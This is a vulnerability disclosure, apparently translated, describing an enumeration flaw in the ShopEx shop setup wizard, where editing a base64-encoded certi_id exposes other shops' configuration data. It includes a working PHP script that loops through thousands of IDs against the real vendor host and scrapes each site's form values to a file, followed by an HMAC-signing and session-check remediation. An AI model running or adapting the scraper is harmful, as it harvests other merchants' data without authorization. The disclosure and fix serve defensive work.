Brief description:
A defect in a ShopEx interface allows every site to be enumerated

Details:
The problem is in the ShopEx online-shop setup wizard page

http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=

The refer parameter base64-decodes to {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}

By changing certi_id we can enumerate every site that uses the ShopEx software
<?php
for ($i = 1; $i < 10000; $i++) { // enumerate certi_id values
    ShowshopExD($i);
}

function ShowshopExD($cid) {
    $url = 'http://guide.ecos.shopex.cn/step2.php';
    // refer is plain base64 of a JSON object, so certi_id can be substituted freely
    $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
    $url = $url.'?refer='.$refer;

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
    $result = curl_exec($ch);
    $result = mb_convert_encoding($result, "gb2312", "UTF-8");

    // the wizard echoes refer back into the page when certi_id exists
    if (strpos($result, $refer) !== false) {
        $fp = fopen("c:/shopEx.txt", 'ab'); // save to file
        // pull every text input field out of the response
        preg_match_all('/<input\stype="text"(.*?)\/>/', $result, $value);
        foreach ($value[1] as $key) {
            preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/', trim($key), $res);
            echo $res[1][0].':'.$res[3][0]."\r\n";
            $col = $res[1][0].':'.$res[3][0]."\r\n";
            fwrite($fp, $col, strlen($col));
        }
        echo '--------------------------------'."\r\n";
        fclose($fp);
    }
    flush();
    curl_close($ch);
}
?>
Proof of vulnerability:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
Change refer to use a different encryption scheme
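One way to act on that last line, as an added example written for this report (not ShopEx code): the refer token is signed with an HMAC so that an edited certi_id fails verification, and step2.php additionally checks that the certi_id belongs to the logged-in owner's session, which is the authorization check whose absence makes enumeration possible. REFER_SECRET, REFER_TTL, make_refer(), verify_refer(), authorize_step2() and the session binding are all assumptions, and the secret value is a placeholder.

```php
<?php
// Added example for this report, not ShopEx code. REFER_SECRET, make_refer(),
// verify_refer() and authorize_step2() are assumed names; the secret is a placeholder.
const REFER_SECRET = 'REPLACE-WITH-RANDOM-32-BYTE-SERVER-SECRET';
const REFER_TTL    = 600; // seconds a token stays valid

// Build the token: the JSON payload followed by an HMAC-SHA256 over it.
function make_refer(int $certi_id, string $callback_url, ?int $now = null): string {
    $payload = json_encode([
        'certi_id'     => $certi_id,
        'callback_url' => $callback_url,
        'exp'          => ($now ?? time()) + REFER_TTL,
    ]);
    $sig = hash_hmac('sha256', $payload, REFER_SECRET);
    return base64_encode($payload . '.' . $sig);
}

// Decode and verify the token. Returns the payload, or null if the signature
// does not match (certi_id edited), the token is malformed, or it has expired.
function verify_refer(string $refer, ?int $now = null): ?array {
    $raw = base64_decode($refer, true);
    if ($raw === false || ($pos = strrpos($raw, '.')) === false) {
        return null;
    }
    $payload  = substr($raw, 0, $pos);
    $sig      = substr($raw, $pos + 1);
    $expected = hash_hmac('sha256', $payload, REFER_SECRET);
    if (!hash_equals($expected, $sig)) { // constant-time comparison
        return null;
    }
    $data = json_decode($payload, true);
    if (!is_array($data) || !isset($data['certi_id'], $data['exp'])) {
        return null;
    }
    return ($now ?? time()) > $data['exp'] ? null : $data;
}

// Authorization on step2.php: even a valid token may only show the shop whose
// certi_id is bound to the logged-in owner's session, never an arbitrary one.
function authorize_step2(?array $data, int $session_certi_id): bool {
    return $data !== null && (int) $data['certi_id'] === $session_certi_id;
}

// Constructed demonstration values.
$good = make_refer(1051, 'http://www.a.com/');
var_dump(authorize_step2(verify_refer($good), 1051));   // valid token, matching session
$edited = base64_encode(str_replace('"certi_id":1051', '"certi_id":1052', base64_decode($good)));
var_dump(verify_refer($edited));                         // tampered certi_id is rejected
var_dump(authorize_step2(verify_refer($good), 1052));    // valid token, wrong session
```

The signature alone stops token editing; the session check is what removes the enumeration, since a valid token for one shop must never unlock another.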